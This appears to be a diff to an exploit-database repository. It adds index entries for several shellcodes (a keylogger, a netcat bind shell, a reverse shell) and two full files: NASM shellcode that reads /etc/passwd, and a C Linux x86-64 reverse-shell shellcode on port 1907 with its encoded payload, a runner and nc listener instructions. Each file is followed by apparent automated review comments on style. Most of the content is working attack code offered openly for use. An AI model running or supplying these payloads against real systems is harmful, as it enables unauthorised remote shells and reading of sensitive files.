45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux
45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64



@ -0,0 +1,46 @@
; Exploit Title: /usr/bin/head -n99 cat etc/passwd (poly shellcode-571.php)
; Date: November 29th, 2018
; Exploit Author: Nelis
; Version: 0.2
; Tested on: Ubuntu 12.10
; Filename: headpass.nasm
; SLAE-ID: 1327
; Based on: http://shell-storm.org/shellcode/files/shellcode-571.php
; Shellcode:"\x29\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe6\x50\x68\x2d\x6e\x39\x39\x89\xe7\x50\x68\x68\x65\x61\x64\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x68\x2f\x75\x73\x72\x89\xe3\x50\x57\x56\x53\xb0\x0b\x89\xe1\xcd\x80"
global _start
section .text
_start:
sub eax, eax ; changed from xor eax, eax
push eax ; put 0-term on stack
push dword 0x64777373 ; dwss
push dword 0x61702f63 ; ap/c
push dword 0x74652f2f ; te//
mov esi, esp ; save addr of stack into esi
push eax
push dword 0x39396e2d ; 99n-
mov edi, esp ; save addr of stack into edi
push eax
push dword 0x64616568 ; daeh
push dword 0x2f6e6962 ; /nib
push dword 0x2f2f2f2f ; ////
push dword 0x7273752f ; rsu/ changed from cat to head command
mov ebx,esp ; unchanged (save addr of stack into into ebx)
; mov edx, eax ; set edx to NULL / not already 0x0 / keeping it here in case you encouter issues with it
push eax ; 0-term on stack
push edi ; added for args
push esi ; added for args
push ebx ; pointer to /user////bin/head
mov al, 0xb ; set syscall execve
mov ecx,esp ; move stack pointer into ecx
int 0x80 ; make syscall
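Review bot: The comment on `push ebx` names the path as `/user////bin/head`, but the four pushes above build `/usr////bin/head` (`rsu/`, `////`, `/nib`, `daeh`), so it should read `; pointer to /usr////bin/head`. The commented-out `mov edx, eax` line says edx is both "set to NULL" and "not already 0x0", which contradicts itself; a single clear statement of why the line is disabled would help the next reader. The hex string in the `; Shellcode:` header does match the assembled instructions byte for byte (61 bytes), so that part needs no change.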


@ -0,0 +1,94 @@
/*
reverse shell tcp (1907) port shellcode C language - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell
Test:
run your machine: nc -vlp 1907
and run exploit (./reverse-shell)
check shellcode raw and test ls, who, pwd command.
<shellproccod>: 0x48 0x31 0xc9 0x48 0x81 0xe9 0xf6 0xff
<shellproccod+8>: 0xff 0xff 0x48 0x8d 0x05 0xef 0xff 0xff
<shellproccod+16>: 0xff 0x48 0xbb 0xdf 0x4b 0x06 0xb1 0x71
<shellproccod+24>: 0x71 0x46 0x28 0x48 0x31 0x58 0x27 0x48
<shellproccod+32>: 0x2d 0xf8 0xff 0xff 0xff 0xe2 0xf4 0xb5
<shellproccod+40>: 0x62 0x5e 0x28 0x1b 0x73 0x19 0x42 0xde
<shellproccod+48>: 0x15 0x09 0xb4 0x39 0xe6 0x0e 0x91 0xdd
<shellproccod+56>: 0x4b 0x01 0xc2 0x0e 0x71 0x46 0x29 0x8e
<shellproccod+64>: 0x03 0x8f 0x57 0x1b 0x61 0x1c 0x42 0xf5
<shellproccod+72>: 0x13 0x09 0xb4 0x1b 0x72 0x18 0x60 0x20
<shellproccod+80>: 0x85 0x6c 0x90 0x29 0x7e 0x43 0x5d 0x29
<shellproccod+88>: 0x21 0x3d 0xe9 0xe8 0x39 0xfd 0x07 0xbd
<shellproccod+96>: 0x22 0x68 0x9e 0x02 0x19 0x46 0x7b 0x97
<shellproccod+104>: 0xc2 0xe1 0xe3 0x26 0x39 0xcf 0xce 0xd0
<shellproccod+112>: 0x4e 0x06 0xb1 0x71 0x71 0x46 0x28
assembly code is below:
xor %rcx,%rcx
sub $0xfffffffffffffff6,%rcx
lea -0x11(%rip),%rax # 0x555555558060 <shellproccod>
movabs $0x28467171b1064bdf,%rbx
xor %rbx,0x27(%rax)
sub $0xfffffffffffffff8,%rax
loop 0x55555555807b <shellproccod+27>
mov $0x62,%ch
pop %rsi
sub %bl,(%rbx)
jae 0x5555555580a7 <shellproccod+71>
rex.X ficoms -0x19c64bf7(%rip) # 0x55553b8f349e
xchg %eax,%ecx
fisttpll 0x1(%rbx)
retq $0x710e
rex.RX sub %r9d,0x1b578f03(%rsi)
(bad)
sbb $0x42,%al
cmc
adc (%rcx),%ecx
mov $0x1b,%ah
jb 0x5555555580c6 <shellproccod+102>
and %al,0x7e29906c(%rbp)
rex.XB pop %r13
sub %esp,(%rcx)
cmp $0xfd39e8e9,%eax
mov $0x29e6822,%ebp
sbb %eax,0x7b(%rsi)
xchg %eax,%edi
retq $0xe3e1
es cmp %ecx,%edi
rorb 0x6(%rsi)
mov $0x71,%cl
jno 0x55555555811c
sub %al,(%rax)
*/
#include <stdio.h>
#include <string.h>
unsigned char shellproccod[] = \
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xdf\x4b\x06\xb1\x71\x71\x46\x28\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb5\x62\x5e\x28\x1b\x73"
"\x19\x42\xde\x15\x09\xb4\x39\xe6\x0e\x91\xdd\x4b\x01\xc2\x0e"
"\x71\x46\x29\x8e\x03\x8f\x57\x1b\x61\x1c\x42\xf5\x13\x09\xb4"
"\x1b\x72\x18\x60\x20\x85\x6c\x90\x29\x7e\x43\x5d\x29\x21\x3d"
"\xe9\xe8\x39\xfd\x07\xbd\x22\x68\x9e\x02\x19\x46\x7b\x97\xc2"
"\xe1\xe3\x26\x39\xcf\xce\xd0\x4e\x06\xb1\x71\x71\x46\x28";
int main()
{
printf("Shellcode len: %d\n", strlen(shellproccod));
int (*ret)() = (int(*)())shellproccod;
ret();
}
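Review bot: `printf("Shellcode len: %d\n", strlen(shellproccod))` passes a `size_t` to `%d`, which is undefined behaviour and warns under `-Wformat`; use `%zu` (or cast to `int`). `main` has no return statement; from C99 on, falling off the end of `main` returns 0, but an explicit `return 0;` removes the dependence on the standard level. The disassembly quoted in the header after the `loop` line is not meaningful code — the `(bad)`, `rex.X ficoms` and similar entries show the disassembler reading data, so a note such as `// listing past the loop is raw bytes, not instructions` would stop readers treating it as the program flow.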